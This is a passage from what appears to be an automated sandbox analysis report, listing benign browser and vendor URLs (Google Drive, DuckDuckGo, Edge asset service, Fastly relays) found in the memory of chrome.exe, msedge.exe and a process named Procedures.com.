                Source: chrome.exe, 0000000F.00000003.2590558678.0000327000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577547172.0000327000BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                Source: chrome.exe, 0000000F.00000003.2577547172.0000327000BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/ogl
                Source: chrome.exe, 0000000F.00000003.2590558678.0000327000BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/ogl2p
                Source: manifest.json0.24.drString found in binary or memory: https://drive-autopush.corp.google.com/
                Source: manifest.json0.24.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                Source: manifest.json0.24.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: manifest.json0.24.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: manifest.json0.24.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: manifest.json0.24.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: manifest.json0.24.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: manifest.json0.24.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: manifest.json0.24.drString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: manifest.json0.24.drString found in binary or memory: https://drive-staging.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: manifest.json0.24.drString found in binary or memory: https://drive.google.com/
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003ED7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, Web Data.24.dr, P8Q1VA.11.dr, DJWL6P.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003ED7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, Web Data.24.dr, P8Q1VA.11.dr, DJWL6P.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003ED7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, Web Data.24.dr, P8Q1VA.11.dr, DJWL6P.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 000003.log6.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
                Source: 000003.log6.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                Source: 000003.log6.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                Source: 000003.log7.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                Source: HubApps Icons.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                Source: HubApps Icons.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.dr, HubApps Icons.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                Source: HubApps Icons.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
                Source: 000003.log6.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.dr, HubApps Icons.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                Source: HubApps Icons.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                Source: HubApps Icons.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                Source: HubApps Icons.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
                Source: 000003.log6.24.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://gaana.com/
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/&
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/.
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/8
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/;
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/A
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/D
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/K
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/N
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/U
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/X
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/_
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/b
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/i
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/l
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/s
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/v
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: msedge.exe, 00000017.00000002.2856509680.00002828024C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
